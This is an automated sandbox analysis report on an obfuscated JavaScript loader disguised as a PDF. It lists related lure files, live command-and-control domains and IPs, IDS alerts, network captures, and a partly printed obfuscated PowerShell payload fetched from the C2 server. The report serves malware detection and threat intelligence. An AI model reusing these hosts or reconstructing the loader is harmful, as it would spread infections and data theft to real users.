                                                  • gidcldeaccadneh.top/5nyvigqht1htr.php?id=user-PC&key=79290330744&s=mints13
                                                  Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                  • gidcldeaccadneh.top/fpmerz30vyhtr.php?id=computer&key=44154737485&s=mints13
                                                  Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                  • gidcldeaccadneh.top/se6y3fnhkvhtr.php?id=user-PC&key=69185160161&s=mints13
                                                  51.91.79.17Fattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                    https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                      _Contrato_E2024A493865_PDF.jsGet hashmaliciousUnknownBrowse
                                                        Update.jsGet hashmaliciousSocGholishBrowse
                                                          https://dev-infotechnology.iusering.com/underground-utilities/Get hashmaliciousSocGholishBrowse
                                                            f699.jsGet hashmaliciousUnknownBrowse
                                                              _Rechnung_DE04911985434_PDF.jsGet hashmaliciousUnknownBrowse
                                                                _Factura_623199941314391_PDF_.js.malware.jsGet hashmaliciousUnknownBrowse
                                                                  UPDATE.JSGet hashmaliciousSocGholishBrowse
                                                                    28990167362_PDF_.jsGet hashmaliciousUnknownBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      temp.shFattura88674084.vbsGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      https://send-space.s3.eu-north-1.amazonaws.com/de.htmlGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      _Contrato_E2024A493865_PDF.jsGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      Update.jsGet hashmaliciousSocGholishBrowse
                                                                      • 51.91.79.17
                                                                      https://dev-infotechnology.iusering.com/underground-utilities/Get hashmaliciousSocGholishBrowse
                                                                      • 51.91.79.17
                                                                      f699.jsGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      _Rechnung_DE04911985434_PDF.jsGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      _Factura_623199941314391_PDF_.js.malware.jsGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      UPDATE.JSGet hashmaliciousSocGholishBrowse
                                                                      • 51.91.79.17
                                                                      28990167362_PDF_.jsGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      gidcldeaccadneh.topryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                      • 206.188.196.37
                                                                      Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                      • 206.188.196.37
                                                                      Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      DEFENSE-NETUSryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                      • 206.188.196.37
                                                                      Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                      • 206.188.196.37
                                                                      Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      DEFENSE-NETUSryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      ryOpDCeOHz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                      • 206.188.196.37
                                                                      Fdoze89ykv.jsGet hashmaliciousMint StealerBrowse
                                                                      • 206.188.196.37
                                                                      Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      tibhzuygfuyz.ps1Get hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura05736577.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      Fattura41579790.vbsGet hashmaliciousUnknownBrowse
                                                                      • 206.188.196.37
                                                                      OVHFRhttp://portableapps.comGet hashmaliciousUnknownBrowse
                                                                      • 51.81.32.118
                                                                      http://deepai.orgGet hashmaliciousLiteHTTP BotBrowse
                                                                      • 54.38.113.5
                                                                      xd.arm.elfGet hashmaliciousMiraiBrowse
                                                                      • 198.50.178.226
                                                                      http://www.drawnames.com/wishlist/add/GeoZyywvK48h1oNNizPuIQ-/W47fz4Y7Ik4eooK-94HN8w-Get hashmaliciousUnknownBrowse
                                                                      • 54.36.150.182
                                                                      rtYpMDeKUq.exeGet hashmaliciousXmrigBrowse
                                                                      • 54.37.232.103
                                                                      https://us10.mipcm.com:9743/pub/windows/mipc/v9.1.1.2201131522/MIPC_Setup_v9.1.1.2201131522.exeGet hashmaliciousUnknownBrowse
                                                                      • 54.39.107.85
                                                                      Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                      • 54.38.113.4
                                                                      https://url.us.m.mimecastprotect.com/s/7XsKCQWmqkh6El9PsPhEHGZMGK?domain=hbgone.docdroid.comGet hashmaliciousUnknownBrowse
                                                                      • 54.37.79.95
                                                                      https://www.patrimoine-commerce.com/Get hashmaliciousUnknownBrowse
                                                                      • 54.37.14.19
                                                                      https://www.anwesso.com/link.php?link=3D78_02_04_79_88_2B016-4C-01-3D9662EEC8D094AFED274D8E17627986-06D38F7B48CB30B897Get hashmaliciousUnknownBrowse
                                                                      • 54.36.109.16

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0ebestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                      • 51.91.79.17
                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlxs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 51.91.79.17
                                                                      http://portableapps.comGet hashmaliciousUnknownBrowse
                                                                      • 51.91.79.17
                                                                      Order88983273293729387293828PDF.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                      • 51.91.79.17
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 51.91.79.17
                                                                      QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                      • 51.91.79.17
                                                                      grd.ps1Get hashmaliciousLummaC StealerBrowse
                                                                      • 51.91.79.17
                                                                      SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                      • 51.91.79.17

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1940658735648508
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulJnp/p:NllU
                                                                      MD5:BC6DB77EB243BF62DC31267706650173
                                                                      SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                      SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                      SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@...e.................................X..............@..........

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5geizqmf.3n5.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5vco2e3.4xg.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Reputation:high, very likely benign file
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkqetlq5.g0v.psm1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sfhutis5.tdw.ps1

                                                                      Download File
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                      Static File Info

                                                                      General

                                                                      File type:ASCII text, with very long lines (1153)
                                                                      Entropy (8bit):5.2574100513146345
                                                                      TrID:
                                                                        File name:_DRP12938938231_PDF.js
                                                                        File size:12'898 bytes
                                                                        MD5:b05ee915cdbdb359f19b8e42acebaf48
                                                                        SHA1:f8a4866dd81dde78f6f1a1e11a9594fcbce71612
                                                                        SHA256:41facb3e96a81c04259c40c2170e6dc53047838e0f918dba889fc6510bc4374d
                                                                        SHA512:59abbd040beb90ff17317e51a700344c157fae47d80872609272e3b1b5354b4b2261d61addaa920336fde068b9d43efe270e1da04a1b400e7cc9b5261556976d
                                                                        SSDEEP:192:Jxw9SBFDvaPs2cj0ocV3/YBM7fEo03oTxqeDnzaZ8G9+FTTIgSN8U0U5E06JUDld:Jd33MjzWZ9+FXIxRp6Jc3ruM
                                                                        TLSH:514297287BAF65017D172E8D273FC010EA2060331586E938765EF690AF6D619D7DCEB8
                                                                        File Content Preview:var whichburton0wallsand = whichburton0theirreign;.var whichburton0thispopular = whichburton0theirreign;.function whichburton0theirreign(intohave, theirreign) {. var wallsand = whichburton0intohave();. whichburton0theirreign = function (thispopular,

                                                                        File Icon

                                                                        Icon Hash:68d69b8bb6aa9a86

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-11-15T18:16:26.759187+01002057063ET MALWARE Mints.Loader CnC Activity (GET)1192.168.2.649807206.188.196.2580TCP
                                                                        2024-11-15T18:16:26.759187+01002858291ETPRO MALWARE TA582 CnC Checkin1192.168.2.649807206.188.196.2580TCP
                                                                        2024-11-15T18:16:29.491742+01002859003ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.6583941.1.1.153UDP
                                                                        2024-11-15T18:16:31.016324+01002856654ETPRO MALWARE TA582 CnC Checkin1192.168.2.649834206.188.196.3780TCP
                                                                        2024-11-15T18:16:31.953945+01002038755ET MALWARE Observed DNS Query to Temporary File Hosting Domain (temp .sh)3192.168.2.6626221.1.1.153UDP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 15, 2024 18:16:25.575819969 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:25.580812931 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:25.580897093 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:25.584938049 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:25.589871883 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759094000 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759107113 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759118080 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759129047 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759186983 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.759211063 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759223938 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759262085 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.759284019 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759746075 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759757996 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759771109 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.759793997 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.759824038 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.764153004 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.764172077 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.764182091 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.764221907 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.818249941 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.912504911 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912548065 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912558079 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912566900 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912652016 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912664890 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.912702084 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912870884 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912899971 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912906885 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.912916899 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.912950993 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:26.913274050 CET8049807206.188.196.25192.168.2.6
                                                                        Nov 15, 2024 18:16:26.913320065 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:29.820120096 CET4983480192.168.2.6206.188.196.37
                                                                        Nov 15, 2024 18:16:29.825448990 CET8049834206.188.196.37192.168.2.6
                                                                        Nov 15, 2024 18:16:29.825519085 CET4983480192.168.2.6206.188.196.37
                                                                        Nov 15, 2024 18:16:29.825778008 CET4983480192.168.2.6206.188.196.37
                                                                        Nov 15, 2024 18:16:29.830764055 CET8049834206.188.196.37192.168.2.6
                                                                        Nov 15, 2024 18:16:31.016251087 CET8049834206.188.196.37192.168.2.6
                                                                        Nov 15, 2024 18:16:31.016268015 CET8049834206.188.196.37192.168.2.6
                                                                        Nov 15, 2024 18:16:31.016324043 CET4983480192.168.2.6206.188.196.37
                                                                        Nov 15, 2024 18:16:31.992388964 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:31.992434025 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:31.992501020 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:32.000185966 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:32.000204086 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:32.929924011 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:32.930018902 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:32.933557987 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:32.933567047 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:32.934006929 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:32.941015959 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:32.983335972 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:33.189059019 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:33.189136028 CET4434984751.91.79.17192.168.2.6
                                                                        Nov 15, 2024 18:16:33.189186096 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:33.197438955 CET49847443192.168.2.651.91.79.17
                                                                        Nov 15, 2024 18:16:33.390968084 CET4980780192.168.2.6206.188.196.25
                                                                        Nov 15, 2024 18:16:33.391460896 CET4983480192.168.2.6206.188.196.37

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Nov 15, 2024 18:16:24.913764954 CET5818453192.168.2.61.1.1.1
                                                                        Nov 15, 2024 18:16:25.561127901 CET53581841.1.1.1192.168.2.6
                                                                        Nov 15, 2024 18:16:29.491741896 CET5839453192.168.2.61.1.1.1
                                                                        Nov 15, 2024 18:16:29.819221020 CET53583941.1.1.1192.168.2.6
                                                                        Nov 15, 2024 18:16:31.953944921 CET6262253192.168.2.61.1.1.1
                                                                        Nov 15, 2024 18:16:31.991472006 CET53626221.1.1.1192.168.2.6

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                        Nov 15, 2024 18:16:24.913764954 CET192.168.2.61.1.1.10x23a1Standard query (0)sfibhzu3ubhza.topA (IP address)IN (0x0001)false
                                                                        Nov 15, 2024 18:16:29.491741896 CET192.168.2.61.1.1.10x7dd8Standard query (0)gidcldeaccadneh.topA (IP address)IN (0x0001)false
                                                                        Nov 15, 2024 18:16:31.953944921 CET192.168.2.61.1.1.10x8b5cStandard query (0)temp.shA (IP address)IN (0x0001)false

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                        Nov 15, 2024 18:16:25.561127901 CET1.1.1.1192.168.2.60x23a1No error (0)sfibhzu3ubhza.top206.188.196.25A (IP address)IN (0x0001)false
                                                                        Nov 15, 2024 18:16:29.819221020 CET1.1.1.1192.168.2.60x7dd8No error (0)gidcldeaccadneh.top206.188.196.37A (IP address)IN (0x0001)false
                                                                        Nov 15, 2024 18:16:31.991472006 CET1.1.1.1192.168.2.60x8b5cNo error (0)temp.sh51.91.79.17A (IP address)IN (0x0001)false

                                                                        HTTP Request Dependency Graph

                                                                        • temp.sh
                                                                        • sfibhzu3ubhza.top
                                                                        • gidcldeaccadneh.top

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.649807206.188.196.25802356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Nov 15, 2024 18:16:25.584938049 CET177OUTGET /1.php?s=mints21 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: sfibhzu3ubhza.top
                                                                        Connection: Keep-Alive
                                                                        Nov 15, 2024 18:16:26.759094000 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                        Date: Fri, 15 Nov 2024 17:16:26 GMT
                                                                        Content-Type: text/plain
                                                                        Content-Length: 20324
                                                                        Connection: keep-alive
                                                                        Data Raw: 24 73 6e 74 70 71 76 67 3d 24 65 78 65 63 75 74 69 6f 6e 63 6f 6e 74 65 78 74 3b 24 65 72 6f 72 6f 72 74 69 6f 6e 65 72 72 65 65 72 6f 72 62 65 61 6e 61 72 61 6c 65 73 72 65 69 6e 74 69 6f 6e 20 3d 20 28 5b 63 68 41 52 5b 5d 5d 40 28 28 31 37 33 37 33 34 2f 28 32 32 33 31 33 33 34 36 2f 28 31 36 38 37 39 2d 28 31 34 38 36 36 2d 34 37 39 34 29 29 29 29 2c 28 33 39 37 31 32 34 2f 37 36 33 37 29 2c 28 32 34 35 32 37 31 2f 28 35 33 33 38 2d 28 34 34 39 33 39 37 30 2f 34 33 34 32 29 29 29 2c 28 39 35 37 31 2d 28 39 36 38 32 38 35 37 30 2f 31 30 31 37 30 29 29 2c 28 35 38 39 36 2d 28 31 30 33 37 37 2d 34 35 33 37 29 29 2c 28 31 32 34 37 39 34 2f 28 31 34 34 38 39 39 37 2f 28 34 37 37 32 37 32 34 2f 37 36 31 32 29 29 29 2c 28 2d 38 31 36 34 2b 38 32 32 30 29 2c 28 2d 35 31 37 38 2b 28 36 38 30 38 31 33 33 2f 28 2d 33 38 31 36 2b 35 31 31 37 29 29 29 2c 28 36 30 35 36 2d 36 30 30 31 29 2c 28 37 38 39 2d 37 33 39 29 2c 28 31 30 30 39 38 2d 31 30 30 34 32 29 2c 28 2d 37 33 39 34 2b 37 34 34 32 29 2c 28 2d 38 [TRUNCATED]
                                                                        Data Ascii: $sntpqvg=$executioncontext;$erorortionerreerorbeanaralesreintion = ([chAR[]]@((173734/(22313346/(16879-(14866-4794)))),(397124/7637),(245271/(5338-(4493970/4342))),(9571-(96828570/10170)),(5896-(10377-4537)),(124794/(1448997/(4772724/7612))),(-8164+8220),(-5178+(6808133/(-3816+5117))),(6056-6001),(789-739),(10098-10042),(-7394+7442),(-8792+(16945-(2377+(11265-5538)))),(-1886+(-6161+8102)),(9506-9454),(10188-10132),(7261-(-95+(4958058/679))),(-3994+4050),(9155-(51673221/5679)),(440-391),(389286/(63431991/(72794127/8273))),(-9456+9512),(-8035+(854+(7807-571))),(-5842+(1373+(26095212/(49287108/(14234-(15696-10001)))))),(2458-2403),(422350/8447),(86576/(15109058/9773)),(3026-2978),(-7372+(16605-(54609100/(41203750/(7229-304))))),(5958-(2621+3287)),(68432/(-3961+5183)),(-2691+2740),(-1837+1893),(8968-(3931+4982)),(90-(162934/3974)),(5092-(1861+(9864-6688))),(5644-(25358662/4534)),(-912+(8921-7955)),(-1112+(939+229)),(9418-9362),(1272-(7089280/5830)),(453970/8254),(-8617+8673),(6931-(6047+834)),(485072/ [TRUNCATED]
                                                                        Nov 15, 2024 18:16:26.759107113 CET212INData Raw: 31 35 2b 35 39 37 31 29 2c 28 37 33 32 36 2d 37 32 37 31 29 2c 28 2d 32 37 32 34 2b 32 37 37 39 29 2c 28 37 31 30 2d 36 35 36 29 2c 28 38 37 2d 33 31 29 2c 28 2d 37 37 35 31 2b 37 38 30 31 29 2c 28 34 33 30 30 38 30 2f 28 38 31 32 32 2d 28 31 33
                                                                        Data Ascii: 15+5971),(7326-7271),(-2724+2779),(710-656),(87-31),(-7751+7801),(430080/(8122-(1343-(-2726+(-3223+(11005-(10412-6257)))))))) -join '');$alreonoralaresoraresonened = ([CHaR[]]@((5038-(-2713+7702)),(3358-3309),(-4
                                                                        Nov 15, 2024 18:16:26.759118080 CET1236INData Raw: 34 32 37 2b 28 38 37 37 30 2d 34 32 38 38 29 29 2c 28 37 36 33 38 2d 28 36 39 30 34 39 32 38 37 2f 28 36 35 32 38 31 34 37 33 2f 28 33 39 34 30 2b 28 35 33 38 34 2d 28 35 36 37 31 2d 33 35 32 30 29 29 29 29 29 29 2c 28 2d 35 31 33 31 2b 35 31 38
                                                                        Data Ascii: 427+(8770-4288)),(7638-(69049287/(65281473/(3940+(5384-(5671-3520)))))),(-5131+5185),(242144/4324),(-10087+(36080600/3560)),(-7267+7323),(-7221+7275),(276980/5036),(233010/(27991405/(2854+3633))),(4086-4033),(551502/(12328-2115)),(199528/3563)
                                                                        Nov 15, 2024 18:16:26.759129047 CET212INData Raw: 72 65 73 6f 72 61 72 65 73 6f 6e 65 6e 65 64 29 2e 28 28 5b 63 48 41 72 5b 5d 5d 40 28 28 32 30 31 36 39 2f 32 34 33 29 2c 28 38 35 33 39 38 33 2f 28 31 32 33 36 35 2d 35 30 36 36 29 29 2c 28 35 32 34 32 30 32 2f 28 32 32 32 38 39 32 38 33 2f 34
                                                                        Data Ascii: resoraresonened).(([cHAr[]]@((20169/243),(853983/(12365-5066)),(524202/(22289283/4167)),(4972-(-3719+8576)),(-9980+(2072+(10152-2128))),(870504/7636),(2860-(17169160/(53819552/(7546+1090)))),(-3395+(11714-(2422+5
                                                                        Nov 15, 2024 18:16:26.759211063 CET1236INData Raw: 37 38 37 29 29 29 2c 28 31 30 33 34 33 2d 31 30 32 34 30 29 29 20 2d 6a 6f 69 6e 20 27 27 29 29 28 28 24 5f 20 2a 20 28 39 36 31 2d 28 36 33 32 33 36 34 36 2f 28 34 30 38 37 2b 32 35 30 37 29 29 29 29 2c 20 28 31 30 31 32 33 2d 28 38 37 37 39 2b
                                                                        Data Ascii: 787))),(10343-10240)) -join ''))(($_ * (961-(6323646/(4087+2507)))), (10123-(8779+(-3919+(11791-(3001+(13032-(15639-6136)))))))))});$onbeariseresenonesonarerisat = -join ((-1379+1417)..(10179-10128) | ForEach-Object {[char][int]((22069/(331035
